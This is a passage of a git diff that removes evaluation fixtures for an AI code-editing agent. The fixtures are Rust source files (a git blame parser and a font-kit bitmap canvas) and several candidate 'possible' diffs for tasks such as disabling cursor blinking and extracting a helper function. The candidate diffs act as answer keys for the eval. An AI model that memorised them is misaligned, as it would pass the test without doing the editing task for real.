-18463,7 +18463,7 @@ - } - - self.blink_manager.update(cx, |blink_manager, cx| { -- blink_manager.enable(cx); -+ // blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-04.diff b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-04.diff deleted file mode 100644 index 64a6b85dd37514..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-04.diff +++ /dev/null @@ -1,33 +0,0 @@ -@@ -1774,17 +1774,17 @@ - cx.observe(&buffer, Self::on_buffer_changed), - cx.subscribe_in(&buffer, window, Self::on_buffer_event), - cx.observe_in(&display_map, window, Self::on_display_map_changed), -- cx.observe(&blink_manager, |_, _, cx| cx.notify()), -+ // cx.observe(&blink_manager, |_, _, cx| cx.notify()), - cx.observe_global_in::(window, Self::settings_changed), - observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), - cx.observe_window_activation(window, |editor, window, cx| { - let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { -- if active { -- blink_manager.enable(cx); -- } else { -- blink_manager.disable(cx); -- } -+ // if active { -+ // blink_manager.enable(cx); -+ // } else { -+ // blink_manager.disable(cx); -+ // } - }); - }), - ], -@@ -18463,7 +18463,7 @@ - } - - self.blink_manager.update(cx, |blink_manager, cx| { -- blink_manager.enable(cx); -+ // blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/before.rs b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/before.rs deleted file mode 100644 index 36fccb51327126..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/before.rs +++ /dev/null @@ -1,371 +0,0 @@ -use crate::commit::get_messages; -use crate::{GitRemote, Oid}; -use anyhow::{Context as _, Result, anyhow}; -use collections::{HashMap, HashSet}; -use futures::AsyncWriteExt; -use gpui::SharedString; -use serde::{Deserialize, Serialize}; -use std::process::Stdio; -use std::{ops::Range, path::Path}; -use text::Rope; -use time::OffsetDateTime; -use time::UtcOffset; -use time::macros::format_description; - -pub use git2 as libgit; - -#[derive(Debug, Clone, Default)] -pub struct Blame { - pub entries: Vec, - pub messages: HashMap, - pub remote_url: Option, -} - -#[derive(Clone, Debug, Default)] -pub struct ParsedCommitMessage { - pub message: SharedString, - pub permalink: Option, - pub pull_request: Option, - pub remote: Option, -} - -impl Blame { - pub async fn for_path( - git_binary: &Path, - working_directory: &Path, - path: &Path, - content: &Rope, - remote_url: Option, - ) -> Result { - let output = run_git_blame(git_binary, working_directory, path, content).await?; - let mut entries = parse_git_blame(&output)?; - entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); - - let mut unique_shas = HashSet::default(); - - for entry in entries.iter_mut() { - unique_shas.insert(entry.sha); - } - - let shas = unique_shas.into_iter().collect::>(); - let messages = get_messages(working_directory, &shas) - .await - .context("failed to get commit messages")?; - - Ok(Self { - entries, - messages, - remote_url, - }) - } -} - -const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; -const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; - -async fn run_git_blame( - git_binary: &Path, - working_directory: &Path, - path: &Path, - contents: &Rope, -) -> Result { - let mut child = util::command::new_smol_command(git_binary) - .current_dir(working_directory) - .arg("blame") - .arg("--incremental") - .arg("--contents") - .arg("-") - .arg(path.as_os_str()) - .stdin(Stdio::piped()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()) - .spawn() - .context("starting git blame process")?; - - let stdin = child - .stdin - .as_mut() - .context("failed to get pipe to stdin of git blame command")?; - - for chunk in contents.chunks() { - stdin.write_all(chunk.as_bytes()).await?; - } - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); - if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { - return Ok(String::new()); - } - anyhow::bail!("git blame process failed: {stderr}"); - } - - Ok(String::from_utf8(output.stdout)?) -} - -#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] -pub struct BlameEntry { - pub sha: Oid, - - pub range: Range, - - pub original_line_number: u32, - - pub author: Option, - pub author_mail: Option, - pub author_time: Option, - pub author_tz: Option, - - pub committer_name: Option, - pub committer_email: Option, - pub committer_time: Option, - pub committer_tz: Option, - - pub summary: Option, - - pub previous: Option, - pub filename: String, -} - -impl BlameEntry { - // Returns a BlameEntry by parsing the first line of a `git blame --incremental` - // entry. The line MUST have this format: - // - // <40-byte-hex-sha1> - fn new_from_blame_line(line: &str) -> Result { - let mut parts = line.split_whitespace(); - - let sha = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing sha from {line}"))?; - - let original_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing original line number from {line}"))?; - let final_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing final line number from {line}"))?; - - let line_count = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing line count from {line}"))?; - - let start_line = final_line_number.saturating_sub(1); - let end_line = start_line + line_count; - let range = start_line..end_line; - - Ok(Self { - sha, - range, - original_line_number, - ..Default::default() - }) - } - - pub fn author_offset_date_time(&self) -> Result { - if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { - let format = format_description!("[offset_hour][offset_minute]"); - let offset = UtcOffset::parse(author_tz, &format)?; - let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; - - Ok(date_time_utc.to_offset(offset)) - } else { - // Directly return current time in UTC if there's no committer time or timezone - Ok(time::OffsetDateTime::now_utc()) - } - } -} - -// parse_git_blame parses the output of `git blame --incremental`, which returns -// all the blame-entries for a given path incrementally, as it finds them. -// -// Each entry *always* starts with: -// -// <40-byte-hex-sha1> -// -// Each entry *always* ends with: -// -// filename -// -// Line numbers are 1-indexed. -// -// A `git blame --incremental` entry looks like this: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 -// author Joe Schmoe -// author-mail -// author-time 1709741400 -// author-tz +0100 -// committer Joe Schmoe -// committer-mail -// committer-time 1709741400 -// committer-tz +0100 -// summary Joe's cool commit -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// If the entry has the same SHA as an entry that was already printed then no -// signature information is printed: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html -fn parse_git_blame(output: &str) -> Result> { - let mut entries: Vec = Vec::new(); - let mut index: HashMap = HashMap::default(); - - let mut current_entry: Option = None; - - for line in output.lines() { - let mut done = false; - - match &mut current_entry { - None => { - let mut new_entry = BlameEntry::new_from_blame_line(line)?; - - if let Some(existing_entry) = index - .get(&new_entry.sha) - .and_then(|slot| entries.get(*slot)) - { - new_entry.author.clone_from(&existing_entry.author); - new_entry - .author_mail - .clone_from(&existing_entry.author_mail); - new_entry.author_time = existing_entry.author_time; - new_entry.author_tz.clone_from(&existing_entry.author_tz); - new_entry - .committer_name - .clone_from(&existing_entry.committer_name); - new_entry - .committer_email - .clone_from(&existing_entry.committer_email); - new_entry.committer_time = existing_entry.committer_time; - new_entry - .committer_tz - .clone_from(&existing_entry.committer_tz); - new_entry.summary.clone_from(&existing_entry.summary); - } - - current_entry.replace(new_entry); - } - Some(entry) => { - let Some((key, value)) = line.split_once(' ') else { - continue; - }; - let is_committed = !entry.sha.is_zero(); - match key { - "filename" => { - entry.filename = value.into(); - done = true; - } - "previous" => entry.previous = Some(value.into()), - - "summary" if is_committed => entry.summary = Some(value.into()), - "author" if is_committed => entry.author = Some(value.into()), - "author-mail" if is_committed => entry.author_mail = Some(value.into()), - "author-time" if is_committed => { - entry.author_time = Some(value.parse::()?) - } - "author-tz" if is_committed => entry.author_tz = Some(value.into()), - - "committer" if is_committed => entry.committer_name = Some(value.into()), - "committer-mail" if is_committed => entry.committer_email = Some(value.into()), - "committer-time" if is_committed => { - entry.committer_time = Some(value.parse::()?) - } - "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), - _ => {} - } - } - }; - - if done { - if let Some(entry) = current_entry.take() { - index.insert(entry.sha, entries.len()); - - // We only want annotations that have a commit. - if !entry.sha.is_zero() { - entries.push(entry); - } - } - } - } - - Ok(entries) -} - -#[cfg(test)] -mod tests { - use std::path::PathBuf; - - use super::BlameEntry; - use super::parse_git_blame; - - fn read_test_data(filename: &str) -> String { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push(filename); - - std::fs::read_to_string(&path) - .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) - } - - fn assert_eq_golden(entries: &Vec, golden_filename: &str) { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push("golden"); - path.push(format!("{}.json", golden_filename)); - - let mut have_json = - serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); - // We always want to save with a trailing newline. - have_json.push('\n'); - - let update = std::env::var("UPDATE_GOLDEN") - .map(|val| val.eq_ignore_ascii_case("true")) - .unwrap_or(false); - - if update { - std::fs::create_dir_all(path.parent().unwrap()) - .expect("could not create golden test data directory"); - std::fs::write(&path, have_json).expect("could not write out golden data"); - } else { - let want_json = - std::fs::read_to_string(&path).unwrap_or_else(|_| { - panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); - }).replace("\r\n", "\n"); - - pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); - } - } - - #[test] - fn test_parse_git_blame_not_committed() { - let output = read_test_data("blame_incremental_not_committed"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_not_committed"); - } - - #[test] - fn test_parse_git_blame_simple() { - let output = read_test_data("blame_incremental_simple"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_simple"); - } - - #[test] - fn test_parse_git_blame_complex() { - let output = read_test_data("blame_incremental_complex"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_complex"); - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-01.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-01.diff deleted file mode 100644 index c13a223c63f422..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-01.diff +++ /dev/null @@ -1,11 +0,0 @@ -@@ -94,6 +94,10 @@ - - let output = child.output().await.context("reading git blame output")?; - -+ handle_command_output(output) -+} -+ -+fn handle_command_output(output: std::process::Output) -> Result { - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-02.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-02.diff deleted file mode 100644 index aa36a9241e9706..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-02.diff +++ /dev/null @@ -1,26 +0,0 @@ -@@ -95,15 +95,19 @@ - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { -- let stderr = String::from_utf8_lossy(&output.stderr); -- let trimmed = stderr.trim(); -- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -- } -- anyhow::bail!("git blame process failed: {stderr}"); -+ return handle_command_output(output); - } - - Ok(String::from_utf8(output.stdout)?) -+} -+ -+fn handle_command_output(output: std::process::Output) -> Result { -+ let stderr = String::from_utf8_lossy(&output.stderr); -+ let trimmed = stderr.trim(); -+ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -+ return Ok(String::new()); -+ } -+ anyhow::bail!("git blame process failed: {stderr}"); - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-03.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-03.diff deleted file mode 100644 index d3c19b43803941..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-03.diff +++ /dev/null @@ -1,11 +0,0 @@ -@@ -93,7 +93,10 @@ - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; -+ handle_command_output(output) -+} - -+fn handle_command_output(output: std::process::Output) -> Result { - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-04.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-04.diff deleted file mode 100644 index 1f87e4352c60ce..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-04.diff +++ /dev/null @@ -1,24 +0,0 @@ -@@ -93,17 +93,20 @@ - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; -+ handle_command_output(&output)?; -+ Ok(String::from_utf8(output.stdout)?) -+} - -+fn handle_command_output(output: &std::process::Output) -> Result<()> { - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); - if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -+ return Ok(()); - } - anyhow::bail!("git blame process failed: {stderr}"); - } -- -- Ok(String::from_utf8(output.stdout)?) -+ Ok(()) - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-05.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-05.diff deleted file mode 100644 index 8f4b745b9a1105..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-05.diff +++ /dev/null @@ -1,26 +0,0 @@ -@@ -95,15 +95,19 @@ - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { -- let stderr = String::from_utf8_lossy(&output.stderr); -- let trimmed = stderr.trim(); -- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -- } -- anyhow::bail!("git blame process failed: {stderr}"); -+ return handle_command_output(&output); - } - - Ok(String::from_utf8(output.stdout)?) -+} -+ -+fn handle_command_output(output: &std::process::Output) -> Result { -+ let stderr = String::from_utf8_lossy(&output.stderr); -+ let trimmed = stderr.trim(); -+ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -+ return Ok(String::new()); -+ } -+ anyhow::bail!("git blame process failed: {stderr}"); - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-06.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-06.diff deleted file mode 100644 index 3514d9c8e2969c..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-06.diff +++ /dev/null @@ -1,23 +0,0 @@ -@@ -93,7 +93,12 @@ - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; -+ handle_command_output(&output)?; - -+ Ok(String::from_utf8(output.stdout)?) -+} -+ -+fn handle_command_output(output: &std::process::Output) -> Result { - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); -@@ -102,8 +107,7 @@ - } - anyhow::bail!("git blame process failed: {stderr}"); - } -- -- Ok(String::from_utf8(output.stdout)?) -+ Ok(String::from_utf8_lossy(&output.stdout).into_owned()) - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-07.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-07.diff deleted file mode 100644 index 9691479e2997ca..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-07.diff +++ /dev/null @@ -1,26 +0,0 @@ -@@ -95,15 +95,19 @@ - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { -- let stderr = String::from_utf8_lossy(&output.stderr); -- let trimmed = stderr.trim(); -- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -- } -- anyhow::bail!("git blame process failed: {stderr}"); -+ return handle_command_output(output); - } - - Ok(String::from_utf8(output.stdout)?) -+} -+ -+fn handle_command_output(output: std::process::Output) -> Result { -+ let stderr = String::from_utf8_lossy(&output.stderr); -+ let trimmed = stderr.trim(); -+ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -+ return Ok(String::new()); -+ } -+ anyhow::bail!("git blame process failed: {stderr}"); - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-08.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-08.diff deleted file mode 100644 index f5da859005aef0..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-08.diff +++ /dev/null @@ -1,26 +0,0 @@ -@@ -95,15 +95,19 @@ - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { -- let stderr = String::from_utf8_lossy(&output.stderr); -- let trimmed = stderr.trim(); -- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -- } -- anyhow::bail!("git blame process failed: {stderr}"); -+ return handle_command_output(output); - } - - Ok(String::from_utf8(output.stdout)?) -+} -+ -+fn handle_command_output(output: std::process::Output) -> Result { -+ let stderr = String::from_utf8_lossy(&output.stderr); -+ let trimmed = stderr.trim(); -+ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -+ return Ok(String::new()); -+ } -+ anyhow::bail!("git blame process failed: {stderr}") - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/from_pixels_constructor/before.rs b/crates/agent/src/edit_agent/evals/fixtures/from_pixels_constructor/before.rs deleted file mode 100644 index 12590fe6e93dc6..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/from_pixels_constructor/before.rs +++ /dev/null @@ -1,339 +0,0 @@ -// font-kit/src/canvas.rs -// -// Copyright © 2018 The Pathfinder Project Developers. -// -// Licensed under the Apache License, Version 2.0 or the MIT license -// , at your -// option. This file may not be copied, modified, or distributed -// except according to those terms. - -//! An in-memory bitmap surface for glyph rasterization. - -use lazy_static::lazy_static; -use pathfinder_geometry::rect::RectI; -use pathfinder_geometry::vector::Vector2I; -use std::cmp; -use std::fmt; - -use crate::utils; - -lazy_static! { - static ref BITMAP_1BPP_TO_8BPP_LUT: [[u8; 8]; 256] = { - let mut lut = [[0; 8]; 256]; - for byte in 0..0x100 { - let mut value = [0; 8]; - for bit in 0..8 { - if (byte & (0x80 >> bit)) != 0 { - value[bit] = 0xff; - } - } - lut[byte] = value - } - lut - }; -} - -/// An in-memory bitmap surface for glyph rasterization. -pub struct Canvas { - /// The raw pixel data. - pub pixels: Vec, - /// The size of the buffer, in pixels. - pub size: Vector2I, - /// The number of *bytes* between successive rows. - pub stride: usize, - /// The image format of the canvas. - pub format: Format, -} - -impl Canvas { - /// Creates a new blank canvas with the given pixel size and format. - /// - /// Stride is automatically calculated from width. - /// - /// The canvas is initialized with transparent black (all values 0). - #[inline] - pub fn new(size: Vector2I, format: Format) -> Canvas { - Canvas::with_stride( - size, - size.x() as usize * format.bytes_per_pixel() as usize, - format, - ) - } - - /// Creates a new blank canvas with the given pixel size, stride (number of bytes between - /// successive rows), and format. - /// - /// The canvas is initialized with transparent black (all values 0). - pub fn with_stride(size: Vector2I, stride: usize, format: Format) -> Canvas { - Canvas { - pixels: vec![0; stride * size.y() as usize], - size, - stride, - format, - } - } - - #[allow(dead_code)] - pub(crate) fn blit_from_canvas(&mut self, src: &Canvas) { - self.blit_from( - Vector2I::default(), - &src.pixels, - src.size, - src.stride, - src.format, - ) - } - - /// Blits to a rectangle with origin at `dst_point` and size according to `src_size`. - /// If the target area overlaps the boundaries of the canvas, only the drawable region is blitted. - /// `dst_point` and `src_size` are specified in pixels. `src_stride` is specified in bytes. - /// `src_stride` must be equal or larger than the actual data length. - #[allow(dead_code)] - pub(crate) fn blit_from( - &mut self, - dst_point: Vector2I, - src_bytes: &[u8], - src_size: Vector2I, - src_stride: usize, - src_format: Format, - ) { - assert_eq!( - src_stride * src_size.y() as usize, - src_bytes.len(), - "Number of pixels in src_bytes does not match stride and size." - ); - assert!( - src_stride >= src_size.x() as usize * src_format.bytes_per_pixel() as usize, - "src_stride must be >= than src_size.x()" - ); - - let dst_rect = RectI::new(dst_point, src_size); - let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); - let dst_rect = match dst_rect { - Some(dst_rect) => dst_rect, - None => return, - }; - - match (self.format, src_format) { - (Format::A8, Format::A8) - | (Format::Rgb24, Format::Rgb24) - | (Format::Rgba32, Format::Rgba32) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::A8, Format::Rgb24) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::Rgb24, Format::A8) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::Rgb24, Format::Rgba32) => self - .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), - (Format::Rgba32, Format::Rgb24) => self - .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), - (Format::Rgba32, Format::A8) | (Format::A8, Format::Rgba32) => unimplemented!(), - } - } - - #[allow(dead_code)] - pub(crate) fn blit_from_bitmap_1bpp( - &mut self, - dst_point: Vector2I, - src_bytes: &[u8], - src_size: Vector2I, - src_stride: usize, - ) { - if self.format != Format::A8 { - unimplemented!() - } - - let dst_rect = RectI::new(dst_point, src_size); - let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); - let dst_rect = match dst_rect { - Some(dst_rect) => dst_rect, - None => return, - }; - - let size = dst_rect.size(); - - let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; - let dest_row_stride = size.x() as usize * dest_bytes_per_pixel; - let src_row_stride = utils::div_round_up(size.x() as usize, 8); - - for y in 0..size.y() { - let (dest_row_start, src_row_start) = ( - (y + dst_rect.origin_y()) as usize * self.stride - + dst_rect.origin_x() as usize * dest_bytes_per_pixel, - y as usize * src_stride, - ); - let dest_row_end = dest_row_start + dest_row_stride; - let src_row_end = src_row_start + src_row_stride; - let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; - let src_row_pixels = &src_bytes[src_row_start..src_row_end]; - for x in 0..src_row_stride { - let pattern = &BITMAP_1BPP_TO_8BPP_LUT[src_row_pixels[x] as usize]; - let dest_start = x * 8; - let dest_end = cmp::min(dest_start + 8, dest_row_stride); - let src = &pattern[0..(dest_end - dest_start)]; - dest_row_pixels[dest_start..dest_end].clone_from_slice(src); - } - } - } - - /// Blits to area `rect` using the data given in the buffer `src_bytes`. - /// `src_stride` must be specified in bytes. - /// The dimensions of `rect` must be in pixels. - fn blit_from_with( - &mut self, - rect: RectI, - src_bytes: &[u8], - src_stride: usize, - src_format: Format, - ) { - let src_bytes_per_pixel = src_format.bytes_per_pixel() as usize; - let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; - - for y in 0..rect.height() { - let (dest_row_start, src_row_start) = ( - (y + rect.origin_y()) as usize * self.stride - + rect.origin_x() as usize * dest_bytes_per_pixel, - y as usize * src_stride, - ); - let dest_row_end = dest_row_start + rect.width() as usize * dest_bytes_per_pixel; - let src_row_end = src_row_start + rect.width() as usize * src_bytes_per_pixel; - let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; - let src_row_pixels = &src_bytes[src_row_start..src_row_end]; - B::blit(dest_row_pixels, src_row_pixels) - } - } -} - -impl fmt::Debug for Canvas { - fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { - f.debug_struct("Canvas") - .field("pixels", &self.pixels.len()) // Do not dump a vector content. - .field("size", &self.size) - .field("stride", &self.stride) - .field("format", &self.format) - .finish() - } -} - -/// The image format for the canvas. -#[derive(Clone, Copy, Debug, PartialEq)] -pub enum Format { - /// Premultiplied R8G8B8A8, little-endian. - Rgba32, - /// R8G8B8, little-endian. - Rgb24, - /// A8. - A8, -} - -impl Format { - /// Returns the number of bits per pixel that this image format corresponds to. - #[inline] - pub fn bits_per_pixel(self) -> u8 { - match self { - Format::Rgba32 => 32, - Format::Rgb24 => 24, - Format::A8 => 8, - } - } - - /// Returns the number of color channels per pixel that this image format corresponds to. - #[inline] - pub fn components_per_pixel(self) -> u8 { - match self { - Format::Rgba32 => 4, - Format::Rgb24 => 3, - Format::A8 => 1, - } - } - - /// Returns the number of bits per color channel that this image format contains. - #[inline] - pub fn bits_per_component(self) -> u8 { - self.bits_per_pixel() / self.components_per_pixel() - } - - /// Returns the number of bytes per pixel that this image format corresponds to. - #[inline] - pub fn bytes_per_pixel(self) -> u8 { - self.bits_per_pixel() / 8 - } -} - -/// The antialiasing strategy that should be used when rasterizing glyphs. -#[derive(Clone, Copy, Debug, PartialEq)] -pub enum RasterizationOptions { - /// "Black-and-white" rendering. Each pixel is either entirely on or off. - Bilevel, - /// Grayscale antialiasing. Only one channel is used. - GrayscaleAa, - /// Subpixel RGB antialiasing, for LCD screens. - SubpixelAa, -} - -trait Blit { - fn blit(dest: &mut [u8], src: &[u8]); -} - -struct BlitMemcpy; - -impl Blit for BlitMemcpy { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - dest.clone_from_slice(src) - } -} - -struct BlitRgb24ToA8; - -impl Blit for BlitRgb24ToA8 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - // TODO(pcwalton): SIMD. - for (dest, src) in dest.iter_mut().zip(src.chunks(3)) { - *dest = src[1] - } - } -} - -struct BlitA8ToRgb24; - -impl Blit for BlitA8ToRgb24 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - for (dest, src) in dest.chunks_mut(3).zip(src.iter()) { - dest[0] = *src; - dest[1] = *src; - dest[2] = *src; - } - } -} - -struct BlitRgba32ToRgb24; - -impl Blit for BlitRgba32ToRgb24 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - // TODO(pcwalton): SIMD. - for (dest, src) in dest.chunks_mut(3).zip(src.chunks(4)) { - dest.copy_from_slice(&src[0..3]) - } - } -} - -struct BlitRgb24ToRgba32; - -impl Blit for BlitRgb24ToRgba32 { - fn blit(dest: &mut [u8], src: &[u8]) { - for (dest, src) in dest.chunks_mut(4).zip(src.chunks(3)) { - dest[0] = src[0]; - dest[1] = src[1]; - dest[2] = src[2]; - dest[3] = 255; - } - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/translate_doc_comments/before.rs b/crates/agent/src/edit_agent/evals/fixtures/translate_doc_comments/before.rs deleted file mode 100644 index 12590fe6e93dc6..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/translate_doc_comments/before.rs +++ /dev/null @@ -1,339 +0,0 @@ -// font-kit/src/canvas.rs -// -// Copyright © 2018 The Pathfinder Project Developers. -// -// Licensed under the Apache License, Version 2.0 or the MIT license -// , at your -// option. This file may not be copied, modified, or distributed -// except according to those terms. - -//! An in-memory bitmap surface for glyph rasterization. - -use lazy_static::lazy_static; -use pathfinder_geometry::rect::RectI; -use pathfinder_geometry::vector::Vector2I; -use std::cmp; -use std::fmt; - -use crate::utils; - -lazy_static! { - static ref BITMAP_1BPP_TO_8BPP_LUT: [[u8; 8]; 256] = { - let mut lut = [[0; 8]; 256]; - for byte in 0..0x100 { - let mut value = [0; 8]; - for bit in 0..8 { - if (byte & (0x80 >> bit)) != 0 { - value[bit] = 0xff; - } - } - lut[byte] = value - } - lut - }; -} - -/// An in-memory bitmap surface for glyph rasterization. -pub struct Canvas { - /// The raw pixel data. - pub pixels: Vec, - /// The size of the buffer, in pixels. - pub size: Vector2I, - /// The number of *bytes* between successive rows. - pub stride: usize, - /// The image format of the canvas. - pub format: Format, -} - -impl Canvas { - /// Creates a new blank canvas with the given pixel size and format. - /// - /// Stride is automatically calculated from width. - /// - /// The canvas is initialized with transparent black (all values 0). - #[inline] - pub fn new(size: Vector2I, format: Format) -> Canvas { - Canvas::with_stride( - size, - size.x() as usize * format.bytes_per_pixel() as usize, - format, - ) - } - - /// Creates a new blank canvas with the given pixel size, stride (number of bytes between - /// successive rows), and format. - /// - /// The canvas is initialized with transparent black (all values 0). - pub fn with_stride(size: Vector2I, stride: usize, format: Format) -> Canvas { - Canvas { - pixels: vec![0; stride * size.y() as usize], - size, - stride, - format, - } - } - - #[allow(dead_code)] - pub(crate) fn blit_from_canvas(&mut self, src: &Canvas) { - self.blit_from( - Vector2I::default(), - &src.pixels, - src.size, - src.stride, - src.format, - ) - } - - /// 